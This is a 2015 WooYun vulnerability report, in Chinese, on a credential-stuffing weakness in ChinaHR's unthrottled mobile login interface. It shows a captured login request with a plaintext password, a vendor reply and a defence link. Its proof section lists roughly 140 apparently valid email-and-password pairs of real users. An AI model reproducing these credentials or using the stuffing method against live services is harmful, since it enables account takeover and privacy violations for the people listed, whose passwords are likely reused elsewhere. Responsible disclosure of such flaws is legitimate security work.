中华英才网某接口撞库泄露用户登录凭据(有批量账号证明)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110993

漏洞标题：中华英才网某接口撞库泄露用户登录凭据(有批量账号证明)

漏洞作者：路人甲

提交时间：2015-04-29 19:08

修复时间：2015-06-11 20:47

公开时间：2015-06-11 20:47

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-29：细节已通知厂商并且等待厂商处理中
2015-04-30：厂商已经确认，细节仅向厂商公开
2015-05-10：细节向核心白帽子及相关领域专家公开
2015-05-20：细节向普通白帽子公开
2015-05-30：细节向实习白帽子公开
2015-06-11：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

撞库扫号攻击已经是Top 10 Security Risks for 2014之一.撞库以大量的用户数据为基础，利用用户相同的注册习惯（相同的用户名和密码），尝试登陆其它的网站。2011年，互联网泄密事件引爆了整个信息安全界，导致传统的用户+密码认证的方式已无法满足现有安全需求。泄露数据包括：天涯：31,758,468条，CSDN：6,428,559条，微博：4,442,915条，人人网：4,445,047条，猫扑：2,644,726条，178：9,072,819条，嘟嘟牛：13,891,418条，7K7K：18,282,404条，共1.2亿条。不管你的网站密码保护的多好，但是面对已经泄露的账号密码，撞库扫号防御还是一个相当重要的环节。

详细说明：

mobile的登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现，使用某泄露数据库可以碰撞获得大量有效的登录账号。登录接口抓包如下：

POST /login_ajax.php HTTP/1.1
Host: m.chinahr.com
Proxy-Connection: keep-alive
Content-Length: 122
Accept: */*
Origin: http://m.chinahr.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://m.chinahr.com/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: _ga=GA1.2.1351244397.1430104208; _gat=1; ipgoto_fixurl=http%3A//www.chinahr.com/; currentCityId=; __utmt=1; __utma=162484963.1351244397.1430104208.1430104208.1430216122.2; __utmb=162484963.3.10.1430216122; __utmc=162484963; __utmz=162484963.1430104208.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E5%8C%97%E4%BA%AC%20%E5%A8%9C%E8%BF%A6
RA-Ver: 2.10.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
Connection: close
json=login.json&param=%7B%22uName%22%3A%22koudingnan@163%2ecom%22%2C%22pw%22%3A%22koudingnan%22%2C%22openid%22%3A%22%22%7D

漏洞证明：

经过测试发现，使用某泄露数据库可以碰撞获得大量有效的登录账号.
泄露个人隐私信息。

guya512@163.com	229229114v
592981078@qq.com	369741258
sdrcxchy@163.com	hasfun1988
shengliziwei@qq.com	9001nihaott
henziwolf@yahoo.com	aoe147852369
916600964@qq.com	19881025
chenzhen3133@163.com	13401301391
lygfj@163.com	fujian0725
cxtalent@163.com	chenxin8758
jiakanzheng@126.com	jiakanzheng
437666987@qq.com	jiahong436
liujunwang001@yahoo.com	chinaren
799822833@qq.com	wangwei1989
353715592@qq.com	ww2532219qq
nj017@126.com	gy750310
bagua1127@163.com	cgbagua971612
836220667@qq.com	320061327
4115490@qq.com	danitou922
736421097@qq.com	zhanghang
zay9252@126.com	98830358
xandor@126.com	MaToJIM2
huang_mj@hotmail.com	alixon1973
cwzxhlsl@163.com	19840330
huimeihejie@126.com	19841984
yuyangzhou11@163.com	11916741
leierheart@126.com	leier119
297783374@qq.com	daguai521
jinmaoshu8209@sina.com	nana820921
greenolives88@163.com	ilid1988
enetwell@163.com	rs791004
henze888@163.com	1811800225
valens.oo@163.com	2007iloveu
twinshaha23@gmail.com	cw861217
wfhjy2000@163.com	qw19860826
wmwn520@163.com	13688125494
shaolongwu@vip.qq.com	13051505676
aluxw@163.com	19820826
ayouhao@163.com	ylj10231115
lxf_no1@sohu.com	pa88word
379558672@qq.com	wh19881022
petter0729@163.com	92738123456
xuyuan895252648@qq.com	15155110944
gnmobile@163.com	dreamsky12
weiminggeng@126.com	84713105
elewzl@126.com	wang302698025
liufeippaa@163.com	4456766abc
h604960428@163.com	hu3212482
448217872@qq.com	xiluzai1989
liu5810@sina.com	123456789
bjlining1987@126.com	278897298
siney@yeah.net	sineysoft
zly_20000@sina.com	1125007
dramayang@hotmail.com	kissme
shenlan79@163.com	zxszmxsyy
mvz_number1@163.com	6811268112
wangtao0729@sohu.com	rikky998
ac3698xyx@163.com	39041851
sjx022@126.com	05063022.x
zhunaijie1@163.com	znjgxsim
weijun5035@163.com	w232310j
416277460@qq.com	ccrr19880827
15898858587@163.com	sha543DAN521
firstlove.oomm@yahoo.com.cn	firstlove123
liuyi1072@163.com	811215qq
xiyingze@gmail.com	19841226
87800319@qq.com	13086835821
yuqing_0010@163.com	aaa3812751
jordannike911@163.com	tfl6353213
hhualle@126.com	jhua8810
516418032@qq.com	zhen198849
pp627879340@126.com	qpp86875838
774043804@qq.com	ma2312251
seeyouseemeilyt@yahoo.com.cn	61224you
baolongchang@126.com	2007changbl
lilinming2004@163.com	19850416
wsqgp@126.com	910108jiayou
19769465@163.com	tangkai3
458007410@qq.com	XN07533392363
30809477@qq.com	alex1117
hesheng6053@126.com	550326053
ytmsk@sohu.com	ytmsk7224782
paul3124@163.com	bao243124
fzeleven@hotmail.com	19861229
279402457@qq.com	13644219106
nhuliuwei@163.com	liuwei66
sensen0408@hotmail.com	wushanjian
sprite_davide@163.com	Davide1984
vanlucker@gmail.com	7322861asd
61405069@qq.com	61405069
fragilemeteora@163.com	deadrubbish
yuzhouchenxi@sina.com.cn	47689873cx
pongcn@gmail.com	85825260
hongzuoquan@126.com	jin5211314
che4401@163.com	84457495
boat_x@163.com	19780612
781250122@qq.com	198808302415
shallykipin@126.com	56944013
liushengli2009@163.com	wsjitao5211314
fishcat_111@163.com	wangzheng
124982582@qq.com	manleer92
zihaoye@yahoo.cn	616521929
lancao8@163.com	wl1314521
h0322@163.com	hh5023066
315515745@qq.com	2826466159
haijian_1985@163.com	0208020135
fengyuelianqing@163.com	19890123
foreigngirl@163.com	jamie118
koel2003@163.com	xiaoxiao
zengxin0904@163.com	zengxin19870904
zhkbeyond@tom.com	zhaoke123
lxb2007xz@126.com	LXB518CN
leebaowei@163.com	lee8562878
leivenwong@gmail.com	19830612
hju34@126.com	87191118
ddsb1988@126.com	19880109
xiaohui9932@163.com	xiaohui6899
315513909@qq.com	8243882zhq
punklight@163.com	yhaoguang0211
yugh56@126.com	02061193
8wy2741708@163.com	8wy2741708
1048365007@qq.com	zxc110130
huall500@163.com	19831021
dongyh1987@163.com	dongyh870705
aro70@163.com	gold0814
felix970@163.com	89897xyz168
ma2424@163.com	22224444
270246480@qq.com	zhanghui123qwe
yuyaoningmeng@163.com	wenhao001962
hujingyc@163.com	11051105
greatlilei@163.com	lilei1984
nsk_827@163.com	56321161
mzydianzi@qq.com	13208mzy
itureman.shenpeng@163.com	5060938sp
zhb051239@163.com	198728zb
992544033@qq.com	123456789
johnline@sina.com	jl780502
liyong198813@sina.com	1988131li
lilei102@163.com	2354631000
419475932@qq.com	568568568
zhangfuguiemail@163.com	712515zzj

修复方案：

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-04-30 13:18

厂商回复：

感谢您的关注，我们会尽快修复，谢谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110993

漏洞标题：中华英才网某接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商：中华英才网

漏洞作者：路人甲

提交时间：2015-04-29 19:08

修复时间：2015-06-11 20:47

公开时间：2015-06-11 20:47

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110993

漏洞标题：中华英才网某接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商：中华英才网

漏洞作者： 路人甲

提交时间：2015-04-29 19:08

修复时间：2015-06-11 20:47

公开时间：2015-06-11 20:47

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：18

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0110993"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云